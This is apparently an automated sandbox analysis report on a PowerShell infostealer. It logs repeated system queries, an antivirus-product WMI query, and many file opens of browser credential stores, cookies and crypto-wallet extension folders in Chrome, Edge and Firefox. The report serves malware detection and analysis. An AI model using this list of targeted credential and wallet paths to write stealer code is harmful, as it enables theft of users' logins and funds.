              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: powershell.exe, 00000009.00000002.2885773089.0000000003607000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1196, type: MEMORYSTR
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: powershell.exe, 00000009.00000002.2885773089.0000000003615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: powershell.exe, 00000002.00000002.1708208016.00000000070B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
